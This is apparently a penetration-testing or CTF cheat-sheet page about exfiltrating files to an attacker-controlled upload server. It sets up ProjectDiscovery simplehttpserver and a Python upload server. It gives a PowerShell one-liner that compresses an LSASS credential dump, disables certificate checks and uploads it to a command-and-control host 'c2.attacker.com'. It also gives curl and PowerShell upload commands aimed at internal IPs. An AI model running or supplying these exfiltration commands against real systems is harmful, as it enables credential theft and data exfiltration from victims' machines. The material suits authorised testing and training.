Skip to content

Using Curl to POST data to SimpleHTTPServerWithUpload.py #

ProjectDiscovery SimpleHTTPServer #

  • Simple command for running
    1
    2
    simplehttpserver -https -upload
    simplehttpserver -https -upload -listen 0.0.0.0:443
    
  • Upload a file via curl(Linux) or powershell(Windows). Try to compress first
    • Windows
    • Powershell
      • Possible to convert to one-liner and execute * C:\Windows\system32>powershell "<b;e;l;o;w;>") * Unzip with 7z x lsass.zip
        1
        2
        3
        4
        5
        6
        Compress-Archive -LiteralPath C:\Windows\temp\lsass.dmp -DestinationPath C:\Windows\temp\lsass.zip
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
        
        $uri='https://c2.attacker.com/lsass.zip'
        $uploadPath = 'C:\Windows\temp\lsass.zip'
        Invoke-RestMethod -Uri $uri -Method Put -InFile $uploadPath -UseDefaultCredentials" 
        

Python3 SimpleHTTPServer #

  • Caveats
  • Insecure communications (HTTP)
    • Choose a server that accepts POST request and makes use of HTTPS
  • Download
  • SimpleHTTPServerwithUpload_Python3 from @touilleMan
  • Modify listening port
  • If you want to change the port that the script is listening to (by default 8000/tcp), use below to replace function "test". (i.e. 1337/tcp)
    1
    2
    3
    4
    def test(HandlerClass=SimpleHTTPRequestHandler, ServerClass=http.server.HTTPServer):
    server_address = ('', 1337)
    httpd = ServerClass(server_address,HandlerClass)
    httpd.serve_forever()
    
  • From client-side
  • Once SimpleHTTPServer is running then: (python3 SimpleHTTPServerWithUpload.py)
  • Linux
    1
    curl -F "[email protected]" http://10.1.2.3:8000/
    
  • Powershell
    1
    $wc=New-Object System.Net.WebClient;$resp=$wc.UploadFile('http://10.1.2.3:8000',"C:\Users\Administrator\Desktop\flag.zip")
    

Last update: April 16, 2022